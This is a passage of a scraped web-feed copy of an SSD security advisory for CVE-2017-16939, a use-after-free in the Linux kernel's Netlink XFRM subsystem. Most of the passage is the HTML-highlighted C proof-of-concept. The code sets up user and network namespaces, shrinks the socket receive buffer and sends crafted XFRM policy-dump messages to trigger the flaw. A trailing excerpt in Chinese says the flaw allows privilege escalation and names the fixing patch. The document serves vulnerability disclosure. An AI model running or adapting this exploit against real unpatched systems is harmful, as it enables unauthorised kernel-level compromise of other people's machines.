class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sockaddr_nl<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nl_family<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AF_NETLINK<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nl_pid<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* packet goes into the kernel *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nl_groups<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRMNLGRP_NONE<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* no need for multicast group *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-32\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-33\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-34\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-35\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">do_setsockopt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-36\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0x100<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-38\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">setsockopt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">SO_RCVBUF<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-t\">var<\/span><span 
class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-40\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-41\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-42\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">msg_policy *<\/span><span class=\"crayon-e\">init_policy_dump<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-43\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">msg_policy *<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-45\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">malloc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">msg_policy<\/span><span 
class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;malloc&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-v\">msg_policy<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-52\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x10<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRM_MSG_GETPOLICY<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_flags<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">NLM_F_MATCH<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">NLM_F_MULTI<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span 
class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">NLM_F_REQUEST<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_seq<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_pid<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-59\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-60\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-61\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">send_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span 
class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">nlmsghdr *<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-62\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sendto<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">nlmsg_len<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sockaddr*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sockaddr_nl<\/span><span 
class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;sendto&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-68\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-70\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-71\"><span 
class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-72\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-73\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">create_ns<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-74\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-75\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">unshare<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">CLONE_NEWUSER<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-76\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;unshare(CLONE_NEWUSER)&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-77\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-78\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5a2f045be6354547480509-79\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">unshare<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">CLONE_NEWNET<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-80\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;unshared(CLONE_NEWUSER)&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-81\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-82\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-83\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-84\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argc<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">*<\/span><span 
class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-85\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-86\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">msg_policy *<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">create_ns<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-88\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">create_nl_socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-90\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">init_policy_dump<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">100<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">do_setsockopt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">send_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">init_policy_dump<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-94\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">send_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-96\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0066 seconds] -->  <\/p>\n<div 
class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3563\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1-300x30.jpg\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 11 Dec 2017 08:51:42 +0000<\/strong><\/p>\n<p>\u6f0f\u6d1e\u6982\u8981 \u4ee5\u4e0b\u5b89\u5168\u516c\u544a\u63cf\u8ff0\u4e86\u5728Linux\u5185\u6838\u4e2d\u53d1\u73b0\u7684\u4e00\u4e2aUAF\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u63d0\u5347\u6743\u9650\u3002\u6f0f\u6d1e\u5b58\u5728\u4e8eNetlink \u5957\u63a5\u5b57\u5b50\u7cfb\u7edf \u2013 XFRM. 
Netlink\u7528\u4e8e\u5728\u5185\u6838\u548c\u7528\u6237\u7a7a\u95f4\u8fdb\u7a0b\u4e4b\u95f4\u4f20\u8f93\u4fe1\u606f\u3002 \u5b83\u7531\u7528\u6237\u7a7a\u95f4\u8fdb\u7a0b\u7684\u6807\u51c6\u57fa\u4e8e\u5957\u63a5\u5b57\u7684\u63a5\u53e3\u548c\u5185\u6838\u6a21\u5757\u7684\u5185\u90e8\u5185\u6838API\u7ec4\u6210\u3002 \u6f0f\u6d1e\u63d0\u4ea4\u8005 \u4e00\u4f4d\u72ec\u7acb\u7684\u5b89\u5168\u7814\u7a76\u5458Mohamed Ghannam\u5411Beyond Security\u7684SSD\u62a5\u544a\u4e86\u8be5\u6f0f\u6d1e \u5382\u5546\u54cd\u5e94 \u8be5\u6f0f\u6d1e\u5df2\u5728\u8865\u4e011137b5e\u4e2d\u88ab\u4fee\u590d\uff08\u201cipsec\uff1a\u4fee\u590d\u4e2d\u6b62xfrm\u7b56\u7565\u8f6c\u50a8\u5d29\u6e83\u201d\uff09 CVE: CVE-2017-16939 [crayon-5a2f0459e8bcf346519844\/] \u6f0f\u6d1e\u8be6\u7ec6\u4fe1\u606f \u975e\u7279\u6743\u7528\u6237\u53ef\u4ee5\u66f4\u6539Netlink \u5957\u63a5\u5b57\u5b50\u7cfb\u7edf XFRM sk-> sk_rcvbuf\u7684\u503c\uff08sk ==sock\u7ed3\u6784\u4f53\u5bf9\u8c61\uff09\u3002 \u53ef\u4ee5\u901a\u8fc7setsockopt\uff08SO_RCVBUF\uff09\u66f4\u6539sk-> 